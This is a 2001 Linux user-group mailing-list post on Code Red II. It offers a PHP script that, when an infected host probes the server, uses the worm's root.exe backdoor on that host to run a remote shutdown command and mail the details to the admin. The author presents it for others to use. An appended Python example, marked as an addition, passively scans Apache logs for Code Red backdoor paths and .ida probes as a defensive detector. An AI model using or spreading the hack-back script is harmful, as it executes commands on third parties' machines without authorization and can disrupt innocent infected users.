[NTLUG:Discuss] Code Red Concerns Revisited

Paul Ingendorf pauldy at wantek.net
Tue Sep 11 19:05:00 CDT 2001


In a properly configured Apache and PHP setup with track vars on, you could also use something like the following.

<?php
$remoteserver = fopen("http://" . $REMOTE_ADDR . "/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
$response = fread($remoteserver,0);
mail($SERVER_ADMIN, "Code Red II Attack", "Remote IP: $REMOTE_ADDR\n\n\nServer Name : $SERVER_NAME\n\n\nServer Port : $SERVER_PORT\n\n\nRequest URL : $REQUEST_URI\n\n\nResponse : $response", "From: coderedkiller@$SERVER_NAME\n");
?>

This code should shut the machine down. Power down on most systems. Plus it sends you a nice little e-mail you can use to track all these lamos who, after a month and a week, still run around with their pants down. The only thing I'm not sure of in the code is the response. With the size set to 0, I figured it would just run the specified command, take the result and die, sending me the response so I would know whether it ran right or not. It does not seem to be doing that, so if you wanted you could easily skip that step, or see if you can make it work, and please let me know how you did it.
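As an added example (not part of the original post), the same Code Red II request that the PHP above reacts to can be picked out passively from an Apache access log, producing the fields the post's e-mail carried without sending anything back to the source. The log lines are constructed for illustration; /scripts/root.exe is from the post, and /MSADC/root.exe and the %u-encoded default.ida request are the worm's other known probe paths, so the check also covers the initial infection attempt.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample of an Apache access log: two Code Red II backdoor requests
# from one host, a legitimate request, a Code Red .ida probe, and a junk line.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Sep/2001:18:55:02 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295
10.0.0.5 - - [11/Sep/2001:18:55:03 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 295
192.0.2.7 - - [11/Sep/2001:18:56:10 -0500] "GET /index.html HTTP/1.1" 200 1043
198.51.100.9 - - [11/Sep/2001:18:57:41 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 280
this line is not a log entry
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')

# root.exe is the worm's copy of cmd.exe in the two IIS script directories.
BACKDOOR_PATHS = {"/scripts/root.exe", "/msadc/root.exe"}

def classify(uri):
    """Return a signature name for a Code Red request URI, else None."""
    path = unquote(uri.split("?", 1)[0]).lower()
    if path in BACKDOOR_PATHS:
        return "CodeRedII-backdoor"
    if path == "/default.ida" and "%u" in uri.lower():
        return "CodeRed-ida-probe"   # the .ida overflow the worm spreads by
    return None

def scan_log(text):
    """Parse log lines and return one alert dict per matching request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash
        sig = classify(m["uri"])
        if sig:
            alerts.append({"remote_ip": m["ip"], "time": m["ts"],
                           "request": m["uri"], "status": int(m["status"]),
                           "signature": sig})
    return alerts

def count_by_source(alerts):
    """Hits per remote IP, for deciding whom to notify or firewall."""
    return Counter(a["remote_ip"] for a in alerts)

def alert_text(alert, server_name, server_port):
    """Same fields the post's e-mail carried, minus the remote command."""
    return (f"Remote IP: {alert['remote_ip']}\nServer Name: {server_name}\n"
            f"Server Port: {server_port}\nRequest URL: {alert['request']}\n"
            f"Signature: {alert['signature']}")
```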
